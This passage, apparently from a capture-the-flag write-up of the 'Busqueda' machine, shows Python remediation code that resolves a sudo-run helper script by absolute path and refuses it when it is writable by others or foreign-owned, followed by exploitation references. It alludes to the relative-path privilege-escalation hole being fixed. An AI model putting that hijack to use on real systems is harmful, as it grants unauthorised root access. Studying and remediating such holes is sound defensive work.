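    # Invoked through /bin/sh so the demo does not depend on an exec-capable
    # temp filesystem; the ownership and permission checks are the point.
    r = subprocess.run(["/bin/sh", str(helper)], capture_output=True)
    return r.stderr.decode() if r.stderr else r.stdout.decode()


def demo():
    """Constructed fixture: a scratch script directory exercised from a
    different cwd, then with deliberately bad permissions and ownership."""
    import tempfile
    results = {}
    base = tempfile.mkdtemp()  # created with mode 0700, owned by us
    script = os.path.join(base, "system-checkup.py")
    helper = os.path.join(base, "full-checkup.sh")
    with open(script, "w") as f:
        f.write("# stand-in for the real script\n")
    with open(helper, "w") as f:
        f.write("#!/bin/sh\necho checkup ok\n")
    os.chmod(helper, 0o755)
    me = os.getuid()

    elsewhere = tempfile.mkdtemp()
    old_cwd = os.getcwd()
    os.chdir(elsewhere)  # a relative './full-checkup.sh' lookup would fail here
    try:
        results["output"] = run_full_checkup(script, trusted_uid=me)
        results["resolved"] = str(resolve_helper(script)) == os.path.realpath(helper)
        os.chmod(helper, 0o777)  # now group/other-writable: must be refused
        try:
            run_full_checkup(script, trusted_uid=me)
            results["rejects_writable"] = False
        except PermissionError:
            results["rejects_writable"] = True
        os.chmod(helper, 0o755)
        try:
            check_helper(helper, trusted_uid=me + 1)  # wrong owner: refused
            results["rejects_foreign_owner"] = False
        except PermissionError:
            results["rejects_foreign_owner"] = True
    finally:
        os.chdir(old_cwd)
    return results


if __name__ == "__main__":
    print(demo())
```

In production the trusted uid is 0 and the check runs just before the subprocess call, so an svc-owned or world-writable full-checkup.sh anywhere on the system is never executed by the sudo-entitled script.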

/images/busqueda/busqueda09.png
Privilege Escalation Remediated

References

Command Injection in Python - StackHawk
Introduction to Software Security - Loren Kohnfelder et al.
Exploiting Python Code Injection in Web Applications - Seth Art
Exploiting Python's Eval - Floyd's

